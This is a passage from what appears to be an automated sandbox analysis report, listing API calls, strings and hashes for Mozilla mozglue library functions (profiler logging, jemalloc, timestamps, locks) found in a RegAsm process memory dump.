                                                                            • Opcode Fuzzy Hash: 850acedd25b99a68be3521b7cb5894c940a760b2dc5794777933eb43c6611ce2
                                                                            • Instruction Fuzzy Hash: ED01F67C7403829FEF02CFE9D998F4637B5F756319F1085A9E941A2B80F774AC148A1A
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F619
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC7F598), ref: 6CC7F621
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F637
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F645
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F663
                                                                            Strings
                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC7F62A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                            • API String ID: 2848912005-753366533
                                                                            • Opcode ID: ffc1337b0306320c4519b589804a255f6b18b964a7d56843ec55e5e26d6213ef
                                                                            • Instruction ID: 955aa761d4daec9be374b1bbd7e1032767be0795b111b2fa66af0dd0ca2c9426
                                                                            • Opcode Fuzzy Hash: ffc1337b0306320c4519b589804a255f6b18b964a7d56843ec55e5e26d6213ef
                                                                            • Instruction Fuzzy Hash: 3BF0547D200244AFDB106BE9889895AB77DEF8629DF000055FA0593B51EB759C058B79
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CC6CFAE,?,?,?,6CC331A7), ref: 6CC705FB
                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CC6CFAE,?,?,?,6CC331A7), ref: 6CC70616
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CC331A7), ref: 6CC7061C
                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CC331A7), ref: 6CC70627
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: _writestrlen
                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                            • API String ID: 2723441310-2186867486
                                                                            • Opcode ID: 9717193d6b4936a832bcccc0a3173ba9617d0cf678eff63da4ed1de1833f9121
                                                                            • Instruction ID: 8448eb741d95dbd6a7c897f767ed284fa9503f13eda64439af8da0f14e1fa635
                                                                            • Opcode Fuzzy Hash: 9717193d6b4936a832bcccc0a3173ba9617d0cf678eff63da4ed1de1833f9121
                                                                            • Instruction Fuzzy Hash: CCE08CE2A0201037F5142296AC8ADFB761CDBC6234F080039FD1D82301F94BAD1A51F6
                                                                            APIs
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC89BAE
                                                                            • free.MOZGLUE(?,?), ref: 6CC89BC3
                                                                            • free.MOZGLUE(?,?), ref: 6CC89BD9
                                                                              • Part of subcall function 6CC893B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC894C8
                                                                              • Part of subcall function 6CC893B0: free.MOZGLUE(6CC89281,?), ref: 6CC894DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                            • String ID:
                                                                            • API String ID: 956590011-0
                                                                            • Opcode ID: 8079de7fc29dee28cf54a4667e0e4a61803fc541fc9444b9aee8fece22033cb4
                                                                            • Instruction ID: 0bf821cfa3de2235c5314fc1c9a1661df9e5f09f65e77d73e1ba564eed2506b0
                                                                            • Opcode Fuzzy Hash: 8079de7fc29dee28cf54a4667e0e4a61803fc541fc9444b9aee8fece22033cb4
                                                                            • Instruction Fuzzy Hash: C3B1CF71A057048BCB01CF58C8805AFF7F5FFC9328B548629E85AAB741EB31E946CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b1ffe751c343994b50fda7c0a4a2c787b5bfa0025e602c680fe3f92877cafbc4
                                                                            • Instruction ID: 32884f1deb3cd39dbef57196997e50be86062bd21152c29875512aa4b00f484b
                                                                            • Opcode Fuzzy Hash: b1ffe751c343994b50fda7c0a4a2c787b5bfa0025e602c680fe3f92877cafbc4
                                                                            • Instruction Fuzzy Hash: 5FA148B4A00745CFDB24CF69C594A9AFBF1BF89304F44866ED84A97B01E730A945CFA0
                                                                            APIs
                                                                              • Part of subcall function 6CC76060: moz_xmalloc.MOZGLUE(00000024,A68410D1,00000000,?,00000000,?,?,6CC75FCB,6CC779A3), ref: 6CC76078
                                                                            • free.MOZGLUE(-00000001), ref: 6CC772F6
                                                                            • free.MOZGLUE(?), ref: 6CC77311
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$moz_xmalloc
                                                                            • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                            • API String ID: 3009372454-760240034
                                                                            • Opcode ID: 4269efbd4c30d7d396bffd4368222d669c501c375881d53862873657ce95e6d1
                                                                            • Instruction ID: 73198932d10ceda67cebf2c23cff71e575fa2e4bd4baaffbe8b6c2b446984d6f
                                                                            • Opcode Fuzzy Hash: 4269efbd4c30d7d396bffd4368222d669c501c375881d53862873657ce95e6d1
                                                                            • Instruction Fuzzy Hash: C371B571F006198FCB19CF69C8906ADB7F2EF84314F25812DD81AA7B14EB31E946DB90
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC914C5
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC914E2
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC91546
                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC915BA
                                                                            • free.MOZGLUE(?), ref: 6CC916B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                            • String ID:
                                                                            • API String ID: 1909280232-0
                                                                            • Opcode ID: 8bdb2f17d1480f0a23a472939e79ef36dbf13ce619ee201eeef7b995d0d3dcb9
                                                                            • Instruction ID: 8e26460293ed9733fbf94ea2a8bb779337280dd7279f523cafbead84053ff015
                                                                            • Opcode Fuzzy Hash: 8bdb2f17d1480f0a23a472939e79ef36dbf13ce619ee201eeef7b995d0d3dcb9
                                                                            • Instruction Fuzzy Hash: 6E61EE76A017409FDB118F29C880BDEBBB4BF89308F45851CED8A57711EB30E959CB91
                                                                            APIs
                                                                            • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC8C1F1
                                                                            • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CC8C293
                                                                            • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC8C29E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: fgetc$memcpy
                                                                            • String ID:
                                                                            • API String ID: 1522623862-0
                                                                            • Opcode ID: 864ab82adef7f4a2357b3e6896b9c44bf932d07bcadd7c8a4b4d1949e338d436
                                                                            • Instruction ID: 920929b216089474a1a7bb252a6a32122ebc0a0c903d15cef3b0c53d6d866a81
                                                                            • Opcode Fuzzy Hash: 864ab82adef7f4a2357b3e6896b9c44bf932d07bcadd7c8a4b4d1949e338d436
                                                                            • Instruction Fuzzy Hash: 3A619C71A02618CFCF15DFA8D8805AFBBB5FF49318F154629E902A7790E731A945CFA0
                                                                            APIs
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC89FDB
                                                                            • free.MOZGLUE(?,?), ref: 6CC89FF0
                                                                            • free.MOZGLUE(?,?), ref: 6CC8A006
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC8A0BE
                                                                            • free.MOZGLUE(?,?), ref: 6CC8A0D5
                                                                            • free.MOZGLUE(?,?), ref: 6CC8A0EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                            • String ID:
                                                                            • API String ID: 956590011-0
                                                                            • Opcode ID: 8df95bf3468f4dcb70a5b93bb41ba8a01abbb89e792dcfe39741a4f872a2951c
                                                                            • Instruction ID: 9c19301ef556c554c1055d4111ec05caa02896369e989cbeecb3336dbf044415
                                                                            • Opcode Fuzzy Hash: 8df95bf3468f4dcb70a5b93bb41ba8a01abbb89e792dcfe39741a4f872a2951c
                                                                            • Instruction Fuzzy Hash: C261A0759096019FC711CF18C48055AB7F5FFC8328F548669E89A9B702EB32E996CBC1
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8DC60
                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CC8D38A,?), ref: 6CC8DC6F
                                                                            • free.MOZGLUE(?,?,?,?,?,6CC8D38A,?), ref: 6CC8DCC1
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CC8D38A,?), ref: 6CC8DCE9
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CC8D38A,?), ref: 6CC8DD05
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CC8D38A,?), ref: 6CC8DD4A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                            • String ID:
                                                                            • API String ID: 1842996449-0
                                                                            • Opcode ID: 302164b4bdc4204a8f5fbefc04d345935966b577cbc528d8b63c052ead2e8c54
                                                                            • Instruction ID: f95ab5b4610a31dd541f95dcbf7d8d8831b510fef9ec918727a68d02dc9b95bd
                                                                            • Opcode Fuzzy Hash: 302164b4bdc4204a8f5fbefc04d345935966b577cbc528d8b63c052ead2e8c54
                                                                            • Instruction Fuzzy Hash: 01416DB5A01606CFCB40CF99C88099BBBF5FF89318B65456AE945A7B11E771FC10CB90
                                                                            APIs
                                                                              • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                              • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC76727
                                                                            • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CC767C8
                                                                              • Part of subcall function 6CC84290: memcpy.VCRUNTIME140(?,?,6CC92003,6CC90AD9,?,6CC90AD9,00000000,?,6CC90AD9,?,00000004,?,6CC91A62,?,6CC92003,?), ref: 6CC842C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                            • String ID: data
                                                                            • API String ID: 511789754-2918445923
                                                                            • Opcode ID: 868b79dfd72263b26f106d93265602dabf269a79dfc1c2bf0422cd05cb11deb2
                                                                            • Instruction ID: 4c7fee14074932d8afbb4927f9e725613be66797e8b279bba5f0a1475bae2ffc
                                                                            • Opcode Fuzzy Hash: 868b79dfd72263b26f106d93265602dabf269a79dfc1c2bf0422cd05cb11deb2
                                                                            • Instruction Fuzzy Hash: F2D1BD75A087408FD724CF65C851B9BBBE5EFC5348F10892DE48997B91FB30A849CB62
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000001), ref: 6CC7CA57
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7CA69
                                                                            • Sleep.KERNEL32 ref: 6CC7CADD
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC7CAEA
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC7CAF5
                                                                            • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CC7CB19
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
                                                                            • String ID:
                                                                            • API String ID: 432163150-0
                                                                            • Opcode ID: 7d02d78f467141439ae84c3e4898b4e6a0cb818677f42f857feb5c8e0ade883c
                                                                            • Instruction ID: d79050ac2998823432c5fe52da4459f5996a51e36e5001a78addb565db5c69d2
                                                                            • Opcode Fuzzy Hash: 7d02d78f467141439ae84c3e4898b4e6a0cb818677f42f857feb5c8e0ade883c
                                                                            • Instruction Fuzzy Hash: CE214731B046098BCB08EF78989506FF7BDFFC6355F808629E845A7680FF7095988791
                                                                            APIs
                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CC8C82D
                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CC8C842
                                                                              • Part of subcall function 6CC8CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6CCAB5EB,00000000), ref: 6CC8CB12
                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6CC8C863
                                                                            • std::_Facet_Register.LIBCPMT ref: 6CC8C875
                                                                              • Part of subcall function 6CC6B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6CCAB636,?), ref: 6CC6B143
                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CC8C89A
                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC8C8BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                            • String ID:
                                                                            • API String ID: 2745304114-0
                                                                            • Opcode ID: ad86ec264a5a47fda1b31331219832c27f8e8dad6352cba228b64b06a68c3f5c
                                                                            • Instruction ID: d6efabef8bd65adb6721dbe20feece3e57f601e32d838ee83afd082c42a582f2
                                                                            • Opcode Fuzzy Hash: ad86ec264a5a47fda1b31331219832c27f8e8dad6352cba228b64b06a68c3f5c
                                                                            • Instruction Fuzzy Hash: E911B275B002099FCB00DFF5D9D98AFBB78EF89358B000169E60697341EB34A909CBA5
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CC3EB57,?,?,?,?,?,?,?,?,?), ref: 6CC6D652
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CC3EB57,?), ref: 6CC6D660
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CC3EB57,?), ref: 6CC6D673
                                                                            • free.MOZGLUE(?), ref: 6CC6D888
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$memsetmoz_xmalloc
                                                                            • String ID: |Enabled
                                                                            • API String ID: 4142949111-2633303760
                                                                            • Opcode ID: 5769ecde866987215c214312e5b3e8740b2931b25560c7db08aaaf9a0546d1f5
                                                                            • Instruction ID: d2b9d6e82247c08b8cd15cf5a8286e2bed2ad11bdee209f9620e142a0e38bca8
                                                                            • Opcode Fuzzy Hash: 5769ecde866987215c214312e5b3e8740b2931b25560c7db08aaaf9a0546d1f5
                                                                            • Instruction Fuzzy Hash: F8A118B4A003158FDB11CF6AC5D07AEBBF1AF49318F24845CD889ABB41E735E945CBA1
                                                                            APIs
                                                                            • free.MOZGLUE(?), ref: 6CC80270
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC802E9
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC802F6
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC8033A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                            • String ID: about:blank
                                                                            • API String ID: 2047719359-258612819
                                                                            • Opcode ID: 57ca350a799d56cb7c62ea457a8b9f58af2f19e4448bb172f4a91c248fec11fe
                                                                            • Instruction ID: 108be197c94cc5678d92bb1cf6afe7933a7f2e413cd484210144cb59b4a979f8
                                                                            • Opcode Fuzzy Hash: 57ca350a799d56cb7c62ea457a8b9f58af2f19e4448bb172f4a91c248fec11fe
                                                                            • Instruction Fuzzy Hash: 0E51B179A022198FCB00DF98C48099AFBF1FF49328F644559D81AA7B41E731BC45CFA4
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E12F
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6CC7E084,00000000), ref: 6CC7E137
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6CC7E196
                                                                            • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6CC7E1E9
                                                                              • Part of subcall function 6CC799A0: GetCurrentThreadId.KERNEL32 ref: 6CC799C1
                                                                              • Part of subcall function 6CC799A0: AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC799CE
